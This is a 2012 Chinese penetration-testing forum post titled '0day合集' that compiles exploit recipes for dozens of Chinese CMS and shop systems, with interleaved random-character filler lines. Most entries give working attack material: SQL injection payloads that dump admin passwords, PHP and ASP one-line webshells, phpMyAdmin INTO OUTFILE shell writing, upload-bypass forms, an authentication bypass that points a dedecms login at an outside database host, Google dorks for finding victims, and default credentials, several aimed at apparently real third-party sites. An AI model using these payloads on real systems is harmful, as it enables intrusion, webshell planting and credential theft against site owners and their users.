中国网络渗透测试联盟
标题:
0day合集
[打印本页]
作者:
admin
时间:
2012-9-13 16:58
标题:
0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
& e& C7 q# G! K5 ^2 h3 f1 V
. H3 a9 }: p: O; M& I$ e: p6 W
直接上exploit:
0 O( [3 Y6 _6 B+ d( ]# V8 h
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
, E- K, X: U! ^; ]( s
test:
http://www.tb11.net/system/xitong/shownews.asp?id=210
( H! L! d; n) S
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ Q8 e5 S2 _$ t4 b" }6 Q! u1 j
Asprain论坛 注册用户 上传图片就可拿到webshell
! A- ~% N) y) K, Z3 L3 u2 T O
: P* |3 |1 P2 A
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
4 k9 k8 E1 a5 ]4 N9 k9 x$ a
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
; J2 f: Z" I$ w, h) \; Y* a( W
2.gif 为一小图片文件,一定要小,比如qq表情图片
' }; r" X! I0 L* I2 s X3 C
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
2 X3 f0 J- x" O* p: W2 L a" {* s6 a
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
" u' f3 |) u7 V- I4 A
5.q.asp;.gif
3 t. [4 O' S+ i! I7 f1 s, p
google:Powered by Asprain
5 ? X i6 d( ]( Z% s
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# N b' v$ P8 r( ]
0 h) [3 v1 D9 C6 N( U
ShopNum1全部系统存在上传漏洞。
: M0 K- n9 j+ B
; c9 h$ B! G! Q- Q1 ?; k6 q, e
首先 在
http://www.shopnum1.com/product.html
页面查看任意产品详细说明。
4 }9 V% z c' \! U1 F
按说明 提示登录后台。。
6 O/ B* ~) Y( Q4 c" X- \
在后台功能页面->附件管理->附件列表
' A$ `+ {3 w9 T: J: A5 D7 B: w1 X
可以直接上传.aspx 后缀木马
5 I" M0 F8 l& S7 i& R, x) [9 G* b
http://demo.shopnum1.com/upload/20110720083822500.aspx
# E' Q: `* N( d w% O; Y9 O
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 J6 h+ y4 ]$ d P s
# B& @* n Q$ M" w3 u9 `
牛牛CMS中小企业网站管理系统 上传漏洞
' n% h2 S+ X( c2 S" c
3 N- F2 o' R" N0 K1 |2 y; Z
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
7 w2 l& M6 B& o" s+ o; y) o
后台:admin/login.asp
/ ]! |- S1 ]7 s4 n
ewebeditor 5.5 Nday
7 L' r( |% T0 V& G- N+ T
exp:
. E4 W$ b9 N8 j$ s9 ^$ r3 Q' {
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
1 D$ r" d2 D a
<input?type=file?name=uploadfile?size=100><br><br>?
; } l$ _9 S" _8 C* l
<input?type=submit?value=upload>?
K5 }5 N5 c' E' X8 E- t' e
</form>
2 s) C: u% E m/ p, _( I
ps:先上传小马.
% o; Q7 H2 I/ J- q3 x6 K9 U( Z1 x" Y
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
3 c$ a- E; L6 e
! b4 H% M5 g9 P2 [# h+ m7 N
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 d4 V/ Y6 k e0 ?5 t" c7 j( y
- Z! p% p$ p4 d Y. I) m
YothCMS 遍历目录漏洞
8 U4 U/ t+ m: ?2 {4 @
- q* z& f* ]! i% @# g1 X' d/ e
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
6 [8 u, c+ J8 B8 @
默认后台:admin/login.asp
+ @: i2 N, H* X# |; j n# V- x
遍历目录:
0 |! I7 @$ ^! s3 n( j/ \
ewebeditor/manage/upload.asp?id=1&dir=../
' F E* R6 G* C# x1 o5 e! I% v
data:
4 f9 F% I, x7 z- R; z
http://www.flycn.net/%23da%23ta%23
\%23db_%23data%23%23.asa
& {9 D1 p9 _# V! P- C+ H1 m" p
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) u, T* z" B2 P; D: q* B- V
! p' i' Y+ p. c; i; b( [
Net112企业建站系统 1.0
3 ~2 T+ p8 l1 S
$ [: ]1 L( E( P3 z
源码简介:
7 ~$ V* R+ ~8 `" ]' }
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
" x9 l9 s$ l' L" V; X: x; z0 S
添加管理员:
5 d4 s, ?' x* S# k; K! V& I. W8 {
http://www.0855.tv/admin/admin.asp?action=add&level=2
$ e1 f* d$ C% ~) I
其实加不加都不是很重要,后台文件都没怎么作验证。
9 L$ c) n: y l8 y8 b
上传路径:
, x9 F3 B( q4 Q( L5 r, n* y
http://www.0855.tv/inc/Upfile.as
... 0&ImgHeight=200
. L' z/ k! r* }+ A3 n, y! L* R
http://www.0855.tv/inc/Upfile.asp?Stype=2
3 i' ^7 \* m) Z2 h: o
怎么利用自己研究。
' e4 B% M1 w+ B. s, R r# k, b
遍历目录:
+ d; c. V# k5 x, v
http://www.0855.tv/admin/upfile.asp?path=../..
: I: P1 n% `' p3 K/ K, ^% O) ~
如:
( r* ?* G/ \+ D/ N
http://www.0855.tv/admin/upfile.asp?path=../admin
8 }1 K0 n4 Q$ j. S
http://www.0855.tv/admin/upfile.asp?path=../data
* J, A0 N4 m. {. I$ v, {+ m8 G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 Z: C6 n) i2 P \# D: ]
4 Y$ v3 \/ ^. X2 N% G2 s% X( y2 z
易和阳光购物商城通杀 上传漏洞
5 g. Y# V3 z4 m2 ]! ~! d
: q. u `" E" o) {' i+ E; c
前提要求是IIS6.0+asp坏境。
! K) n2 L& J0 F& x( f: x" g
漏洞文件Iheeo_upfile.asp
" M, Y6 s# l" p4 A! n$ C& a- B
过滤不严.直接可以iis6.0上传
/ K9 k1 p9 I" t
把ASP木马改成0855.asp;1.gif
. j6 e( s9 \+ r+ v5 K+ d
直接放到明小子上传
# h8 M; k1 j Y# \1 E7 ^
Google搜索:inurl:product.asp?Iheeoid=
1 ]; t# _: R$ f! _, V
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. ]6 v z/ t) l3 |+ o, M
' {6 }* ]( i7 A* x
phpmyadmin后台4种拿shell方法
" n3 u5 ]( L$ H6 ]; M c
- C q' t; I2 m' y) C# i* ?
方法一:
' t1 P2 Y: |! U- t
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
3 e& T9 @- i3 D, v4 r, A/ q
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
8 [$ {3 z( d7 k; D6 \* a
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
8 N1 K- L9 ~9 y; A
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
`9 P" C. C( f8 C
一句话连接密码:xiaoma
! |1 p( a6 b$ `. m: J# S5 d' i
方法二:
# y1 {/ H A! p
Create TABLE xiaoma (xiaoma1 text NOT NULL);
; a/ B9 ~8 ?( \
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
6 ?8 Y- e2 ~! @- F4 m( d2 J& I
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
- U' D1 t2 b( Z
Drop TABLE IF EXISTS xiaoma;
D M* [4 E/ }8 c# h
方法三:
& a( x- I, V9 R% T
读取文件内容: select load_file('E:/xamp/www/s.php');
% [9 `( H0 L! s) v* ^0 a* l: O, r
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
- o( O) B/ [* E7 z, v$ [( t9 S
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
& o1 R$ ]2 p# m
方法四:
& \, {( c! F/ i) n
select load_file('E:/xamp/www/xiaoma.php');
' Y0 B; A- g1 R5 C- v, G
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
1 \9 |& q4 T* k3 @+ ?
然后访问网站目录:
http://www.xxxx.com/xiaoma.php?cmd=dir
! T- l' ]- p7 B8 u8 C7 z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ x8 f( l8 V+ x S' x4 x
) k/ K( z# Q! C/ D3 Z% d) m
传信网络独立开发网站源码0day漏洞
) z" i& |5 h' a/ R; t. H# r3 L, }
# Q& [/ ~( P- T2 V- ]
后台system/login.asp
4 i7 ?7 y3 p( @' l; |
进了后台有个ewebeditor
0 m0 s1 c6 E3 w& `, Y7 H, i
Google 搜索inurl:product1.asp?tyc=
2 @5 z% |2 o) g1 ]. f
编辑器漏洞默认后台ubbcode/admin_login.asp
* u' b, v& t- c6 M1 C5 R- G4 A$ S
数据库ubbcode/db/ewebeditor.mdb
( C5 } e- y; Q
默认账号密码yzm 111111
8 [8 Z. W* n& g( s2 o' O7 a) q
7 l: }+ m) _$ g; K
拿webshell方法
$ b( z) p, Q( o4 o4 M+ u) N
登陆后台点击“样式管理”-选择新增样式
% D6 w! a6 G3 n- P& b
样式名称:scriptkiddies 随便写
7 V4 d! h1 F4 ^6 O9 w% ^
路径模式:选择绝对路径
( x$ O* }! ]4 ]$ I. e
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
3 n# Y* C0 Q) J0 q+ o2 D; s, Z
图片类型比如就是我们要上传的ASP木马格式
" _5 T: V% E6 B% r+ E' R
上传路径:/
7 J9 v3 h2 N& T8 M" o+ T
图片限制:写上1000 免的上不了我们的asp木马
2 i& y/ C5 t7 k9 L1 Y6 T( n" r
上传内容不要写
+ [/ R4 T/ w4 S, J# U7 K
可以提交了
8 _0 T" V) ^. P/ w
样式增加成功!
1 t+ \% `1 q3 W; z
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
) B9 l( s4 p9 ]4 R
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
# Y) u$ ~2 M. F9 l# w
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
8 @% a- T. s+ \& V
上ASP木马 回车 等到路径
4 b9 d/ m+ F- l# B
6 k: _+ w, u j8 O! X6 F
后台:system/login.asp
0 s8 z( r( B8 Y0 o
Exp:
( u2 y$ H8 k0 J
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
# Z( T# y4 H" R$ M' l; B: ~
测试:
- j% X9 B. }& \: R. |+ t/ G
http://www.zjgaoneng.com/product_show.asp?id=9
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
9 _. T N7 y" S8 x2 z9 f
http://www.yaerli.com/product_show.asp?id=245
union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
; O9 H2 P' R6 {2 i* ?) z1 \6 c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 i) s y, z( u W: u
- T) O3 b3 J7 m- c+ S- S
foosun 0day 最新注入漏洞
# S3 }. c3 r* c4 T
; x% r$ @$ G: s
漏洞文件:
www.xxx.com/user/SetNextOptions.asp
, V% {3 N- b# v( d" Z) A
利用简单的方法:
' L$ J# ~: S; Y+ b
暴管理员帐号:
% ]: u7 `$ ^; A, A
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
+ {4 X& e- v7 N% j
暴管理员密码:
! L" T" S0 Z# a4 I& j; S; l+ O( d
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_pass_word,
8 n* O/ ?" h! E* h( i; `' T& D5 B
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% S# W% n8 h- D' T
: m7 n& e1 y3 J8 n
网站程序的版权未知!
0 w8 ]/ C% ^ A
# I2 r0 ?* `6 q4 z' e
默认网站数据库:
3 ?" @; H4 u! ]0 G8 R8 \) N
www.i0day.com/data/nxnews.mdb
0 W7 R& e. H6 }; N
ewebeditor 在线编辑器:
4 t& s- ]% u U4 Y
编辑器数据库下载地址:
www.i0day.com/ewebeditor/db/ewebeditor.mdb
{ ^2 G: e9 u
登录地址:ewebeditor/admin_login.asp
5 `+ z) z0 x2 Q. s/ |
默认密码:admin admin
4 b" A2 Q- D: ?) g
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
$ B; T: `. r$ g9 [3 [
+ i- h/ t1 @6 ?
Sql注入漏洞:
4 x: M z$ @$ _( \
http://www.i0day.com/detail.asp?id=12
; Q& z8 S8 D' ~: B) C4 g
exp:
. u8 W4 h G) o5 B% E( Z' z
union select 1,admin,password,4,5,6,7,8 from admin
$ g5 z2 A# ^3 Q6 a
爆出明文帐号/密码
% s$ ?- [; m) b# q
& T: @, l9 B2 w y( ^; x/ k
上传漏洞:
% b. E' J- U& B N" [" @ f
后台+upfile.asp
1 j4 v3 H+ A }% b, X
如:
* W' \9 I0 C+ k
http://www.i0day.com/manage/upfile.asp
可以用工具。如明小子。
f! e2 y/ s1 v4 A. h- S
shell的地址:网址+后台+成功上传的马
- o/ `9 I& ?. G
google:inurl:news.asp?lanmuName=
; S# b/ g$ C3 o; j
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 }8 [ ?5 i; Y1 n/ |
! ]- ^. d! l+ q
dedecms最新0day利用不进后台直接拿WEBSHELL
3 F6 M* u8 R( ]6 e8 s
3 X. \% y, q, \# y* l: y
拿webshell的方法如下:
( C" ]. H. S. H5 R0 ?
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
3 r5 o* D' V# g2 V3 y$ ]7 X
前题条件,必须准备好自己的dede数据库,然后插入数据:
( G% K V' F+ ?+ }' n. M
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
9 ~& i- |6 N! s
1 q; ^. X% E+ `- ?
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
s) Y$ U+ x) _" k5 r; E& o
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
3 F+ K1 [" f; G; d
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
+ \4 N' U* y. s/ X
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
; K1 _5 o& {0 J; n% B4 q1 [' `
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
) d2 T* f( k) B+ H0 }
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
0 d% s, F4 G. {% o8 E
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
9 x4 Z* M' x! H! M. b: c
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
! b$ p. E6 s" s; x" P! a" o. l
<input type="text" value="true" name="nocache" style="width:400">
4 m+ {/ y, p* [7 c- _+ C
<input type="submit" value="提交" name="QuickSearchBtn"><br />
4 |1 o$ L# N6 T- e; Y) W: _& I$ z* I
</form>
) C, W5 d* T/ ]2 `; |0 ]
<script>
& t# K: ]% p+ V0 a/ _, I$ S& C
function addaction()
+ h( j6 [1 ?$ Z n$ Y9 c1 z% A* L# y4 w
{
) m: N- r8 b* T( b
document.QuickSearch.action=document.QuickSearch.doaction.value;
( E* Y6 g$ b9 t# _
}
* C# V- z9 S' [* g0 n5 h% i
</script>
( s/ E, H4 o) R5 Z9 \8 i1 m
-----------------------------------------------------------------------------------------------------------------------------------------------
& }. @* D5 v, K) Y
" V0 h! d) Y1 x
dedecms织梦暴最新严重0day漏洞
! h; `" R: ~' y! a3 R# X9 L$ c
bug被利用步骤如下:
# H$ X( f( i2 a
http://www.2cto.com
/网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
2 I; V% z8 x8 z- ^ U: M+ v
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
0 p' i/ }" I4 g
-------------------------------------------------------------------------------------------------------------------------------------------
- E. G9 C! e. M5 n* I( W' i
" i% `4 E7 i- R$ L5 ]! f T
多多淘宝客程序上传漏洞
0 _% d2 e/ I/ Z! ~! E
漏洞页面:
5 _' K9 g8 J8 C* O* q1 l. H; z
admin\upload_pic.php
5 h2 t' B1 K+ y' e" j6 f5 V
传送门:
# U& J$ u6 L4 G$ K
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
0 V$ j5 v6 u" y$ j: H
PS:copy张图片马 直接 xxx.php 上传抓包地址!
+ N. z" p. s. l! ?" E# o
------------------------------------------------------------------------------------------------------------------------------------------------------
: C8 C) E. _9 O: J/ x0 D" \; R
% `7 |- |0 Y7 T. M0 I7 G
无忧公司系统ASP专业版后台上传漏洞
& u2 x/ A! U% I, a6 D
漏洞文件 后台上传
* N5 K; L* k: l/ z1 ?
admin/uploadPic.asp
; C- R* g! |# k" W. F" E
漏洞利用 这个漏洞好像是雷池的
2 k* s- w7 \; B4 C) V
http://forum.huc08.com/admin/upl
... ptkiddies.asp;& upload_code=ok&editImageNum=1
( C1 ^( t9 {5 k# F2 F1 Z
等到的webshell路径:
8 y5 X y6 W! d) B; P9 q2 \
/UploadFiles/scriptkiddies.asp;_2.gif
% s5 ~( z4 y' [. D+ Z
---------------------------------------------------------------------------------------------------------------------------------------------------
, i" w, ~; C: Q4 t+ L' X8 e4 g8 M; @
' C1 `& x$ |( t' y$ H0 T* V) t5 g
住哪酒店分销联盟系统2010
1 t& I- w7 Z* W# g! n& ?: M
Search:
2 N) o- t, l: ?- W
inurl:index.php?m=hotelinfo
2 D+ {0 \% x, N9 x
http://forum.huc08.com
/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
# i* w% X7 e1 v% N
默认后台:index.php?m=admin/login
% y( p+ B; q* k2 E( A _/ {
--------------------------------------------------------------------------------------------------------------------------------------------------
5 X3 b1 J! |3 U* E
% V0 g+ B' L' U( N
inurl:info_Print.asp?ArticleID=
" k5 S8 ~+ W# D: J8 j8 h# E/ o
后台 ad_login.asp
7 z1 |' n6 L: C$ g7 F/ x
爆管理员密码:
7 T) D8 {5 ]2 |7 D0 f
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
' d; \4 I6 q# A8 X% X6 s
------------------------------------------------------------------------------------------------------------------------------------------------------------
' _" A" c5 K) J5 ^$ K
0 R- `4 P) N7 ?
搜索框漏洞!
( W- j! G7 S* }/ x7 R0 Y. c. E
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
4 \! d- n/ n% x7 j
--------------------------------------------------------------------------------------------------------------------------------------------------------
6 f5 F& a l8 ^: H
8 v" h, e; Q" g% z% @! J7 v
关键字:
3 N7 v. f! Y' r5 }! N4 W8 B0 i+ V
inurl:/reg_TemletSel.asp?step=2
6 c; V4 ^! g9 j5 ~1 Y
或者
+ x1 `) H8 }" T6 P
电子商务自助建站--您理想的助手
2 J8 i+ X% f( R3 F: {; r6 k# D
-------------------------------------------------------------------------------------------------------------------------------------------------
) {* ?# Y% [! r3 k4 a& G0 b q
1 A( v2 M7 G. k5 A7 x( W& |
iGiveTest 2.1.0注入漏洞
b# M! w" W9 f( W3 M8 F v
Version: <= 2.1.0
; S( t6 [$ F$ B0 P! n; o" x
# Homepage:
http://iGiveTest.com/
5 c' z: e. M$ g0 O2 E/ K9 X U
谷歌关键字: “Powered by iGiveTest”
3 o, ? l7 B2 T9 b9 O
随便注册一个帐号。然后暴管理员帐号和密码
" U+ B D j0 w1 M
http://www.xxxx.com/users.php?ac
... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
: V L0 A' W# {1 R+ v% D+ t
------------------------------------------------------------------------------------------------------------------------------------------------
. j! B: F0 @1 E- u* f( B( A
0 G1 ]( X8 n& E- m
CKXP网上书店注入漏洞
; z" {. i3 r4 |9 ?3 Y4 F
工具加表:shop_admin 加字段:admin
* i0 K! C3 K2 Q5 `$ T
后台:admin/login.asp
; }) ]/ \! w/ W- n
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
" e3 q3 r, d" l- L( w
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
, C0 ^6 ^" i+ I# I$ d- H/ D
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- j1 B$ Q+ g4 r9 h- X5 W1 Q; g
: O, r. z8 H; i1 Z! s
段富超个人网站系统留言本写马漏洞
; N3 a' I) Z. C+ b5 H* _9 Q) F: \7 t
源码下载:
http://www.mycodes.net/24/2149.htm
! q5 w- m) V+ K" L0 h
addgbook.asp 提交一句话。
% t) \ R. J+ `$ [4 |
连接:
http://www.xxxx.tv/date/date3f.asp
- e! q! h1 p6 q' v k. T( u+ n
google:为防批量,特略!
4 L" Y X( D5 l! I! I \
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: H# x$ a" z; Q' J
" K6 E) B1 j6 E8 v- n8 {* q# |4 T
智有道专业旅游系统v1.0 注入及列目录漏洞
2 Z* c+ w) k' a1 _
默认后台路径:/admin/login.asp
+ X5 `. b: k" n/ F- U0 L& q1 H$ b7 P
默认管理员:admin
, f& [, @3 k( J$ s. n$ P6 V1 @6 h
默认密码:123456
' Z7 U n, Y3 e4 a5 ~
SQL EXP Tset:
& U1 h- c/ h& L# R* ]' Q8 G
http://www.untnt.com/info/show.asp?id=90
union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
! |6 Q. c. H/ ?/ r
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 R4 q0 M. x3 f2 r
2 ? ~% y' x, ?. u: Y& r
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
( s( h# D" X: P
EXP:
6 T) n h8 g" p& l! j5 b
<title>eWebeditoR3.8 for php任意文件上EXP</title>
0 I' E" A8 l+ N) p1 e! y
<form action="" method=post enctype="multip
& v5 {& ^# Y) o! E
art/form-data">
, _& y* |- B7 |* R; Y- Q( ]
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
" g- ]6 N$ I" E
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
: W1 K: F* A+ t2 L
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
) w! M! B( d9 I$ }7 `
file:<input type=file name="uploadfile"><br>
. G7 q6 ?8 `3 J) z
<input type=button value=submit onclick=fsubmit()>
7 V, b' U5 E# ?" s# g/ `
</form><br>
8 w1 L9 Q5 Y$ B' j5 U# Q' c
<script>
s: F2 \, _( w
function fsubmit(){
; f3 K. o' b3 a' G5 q
form = document.forms[0];
6 S# q' ^ p2 V! a, w
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
% z; I ^0 L+ k2 K- s$ G+ Y. M
alert(form.action);
0 Z' X. x+ J/ [- e6 U
form.submit();
! r/ l3 z) u; E* I9 ~, {7 Y5 t2 r& M
}
$ }0 o/ c5 b6 a5 L2 X
</script>
3 N) G9 S6 ]3 T- ^- J
注意修改里面ewebeditor的名称还有路径。
) m- D5 z1 }9 l. ~! R
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- K7 p9 v: Q1 a8 } U* n
$ v* Z! ?- d0 `; u
提交’时提示ip被记录 防注入系统的利用
2 q6 X, ~, L$ I' n$ G* j
网址:
http://www.xxx.com/newslist.asp?id=122
′
' ^# q" A- g1 x8 p
提示“你的操作已被记录!”等信息。
" M* ?! o/ K1 b# G% I( ]! Q
利用方法:
www.xxx.com/sqlin.asp
看是否存在,存在提交
http://www.xxx.com/newslist.asp?id=122
‘excute(request("TNT"))写入一句话。
- [4 Q4 l! i# X7 A5 P0 X4 s3 C7 p
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 Z' [- M( B# k& T' T% K
8 \/ ^, N& Z* @. O! E2 o
西部商务网站管理系统 批量拿shell-0day
+ Y. s2 O+ ?9 k
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
( \6 Q w! T: @. G+ N1 V2 ~4 C
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
) a, H( q* {1 \! E$ D
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
; H3 `% j& C. s
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
9 `8 o5 s1 L( G5 p. ^4 W5 K
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 ?1 s, D$ g$ J( l* N) S3 v( {, N
# P! k) m- k2 W5 X* j- y
JspRun!6.0 论坛管理后台注入漏洞
/ R: B- k8 L: c2 o' s
$ A% J& V( {( q; G/ Z8 B
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
0 j0 B- U6 g, V- S
JspRun!6.0
4 L6 O4 G& \. n- `3 `; ~
漏洞描述:
) Z2 w6 u+ r% G; k- @: @& ]; H
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
4 `6 |( O) V h7 ]
在处理后台提交的文件中ForumManageAction.java第1940行
/ L3 d, O v! ~6 m- J" `* J0 m
String export = request.getParameter("export");//直接获取,没有安全过滤
5 y0 ]0 y( C" B3 r# I# W
if(export!=null){
4 e6 S; t' R4 K/ V. I
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
5 p p @- V. ^+ j( D% N. u6 W# ]
if(styles==null||styles.size()==0){
- j* O# N7 b' O3 z
<*参考
8 X' ~4 B7 ?$ n2 v; E9 g
nuanfan@gmail.com
) r' C2 [; H. D6 R1 I
*> SEBUG安全建议:
; H5 ^5 ^5 w: u7 k
www.jsprun.net
! V( z0 T; |1 K
(1)安全过滤变量export
3 P1 X% ~ `; C3 O P% r
(2)在查询语句中使用占位符
; f9 A# e4 Y0 r. n
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# |. ^& r9 d: N4 }4 E
$ ]7 r7 o( S9 Q i. @
乌邦图企业网站系统 cookies 注入
Y5 C/ R0 i7 H8 i4 m @
4 \( E( Y% Q7 t& g4 H
程序完整登陆后台:/admin/login.asp
T! z9 f. T+ i
默认登陆帐号:admin 密码:admin888
8 ]$ J: n7 F, {7 e# z
语句:(前面加个空格)
- i1 J6 U. K/ V: ^1 C4 m% c- N
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
; r& `9 k& J. F, [; z
或者是16个字段:
5 r1 [9 l, _! q2 }+ l$ I
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
% t$ F" q& O8 ^: c! s/ ]1 b! B
爆不出来自己猜字段。
9 V) p* i6 B+ o; X4 Z
注入点:
http://www.untnt.com/shownews.asp?=88
0 |5 \ V6 }2 c* c
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
b$ S/ O9 b( T$ \
关键字:
% L: z$ R6 }# g) E1 g( T
inurl:shownews?asp.id=
7 {$ o/ D" B) r3 F6 P$ j
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 {0 I7 H% R F3 K, g* q
9 X, L0 I1 Q! }7 H/ d
CKXP网上书店注入漏洞
4 g6 J) Q2 U1 B" m
; @! i: \* W1 a2 C% t- m1 m7 t
工具加表:shop_admin 加字段:admin
9 C! q. y8 k0 i) \& p6 @" g
后台:admin/login.asp
7 V0 h; O+ b, O* f
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
2 T1 X, l {6 X
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
4 H2 C2 I3 |( F: g2 C1 r
